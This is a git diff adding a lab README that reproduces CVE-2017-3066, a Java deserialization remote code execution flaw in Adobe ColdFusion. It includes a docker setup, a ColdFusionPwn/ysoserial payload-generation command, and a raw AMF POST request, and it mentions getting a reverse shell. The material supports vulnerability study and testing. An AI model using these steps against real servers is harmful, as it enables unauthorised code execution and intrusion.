first commit

coldfusion/CVE-2017-3066/README.md

@@ -0,0 +1,57 @@
+# Adobe ColdFusion AMF Deserialization Remote Command Execution (CVE-2017-3066)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995.
+
+Adobe ColdFusion 2016 Update 3 and earlier, ColdFusion 11 update 11 and earlier, ColdFusion 10 Update 22 and earlier have a Java deserialization vulnerability in the Apache BlazeDS library. Successful exploitation could lead to arbitrary code execution.
+
+References:
+
+- https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html
+- https://www.exploit-db.com/exploits/43993
+- https://github.com/codewhitesec/ColdFusionPwn
+
+## Vulnerable environment
+
+Start a Adobe ColdFusion 11 update 3:
+
+```
+docker compose up -d
+```
+
+After a few minutes wait, visit `http://your-ip:8500/CFIDE/administrator/index.cfm` with password `vulhub`, you can install the Adobe ColdFusion successfully.
+
+## Exploit
+
+Generate a POC via [ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn) in the `poc.ser`:
+
+```
+java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
+```
+
+Send the request to `http://your-ip:8500/flex2gateway/amf`, which contains the `application/x-amf` Content-Type and POC within the body:
+
+```
+POST /flex2gateway/amf HTTP/1.1
+Host: your-ip:8500
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-amf
+Content-Length: 2853
+
+[...poc...]
+```
+
+![](1.png)
+
+`/tmp/success` is successfully created:
+
+![](2.png)
+
+Get a reverse shell:
+
+![](3.png)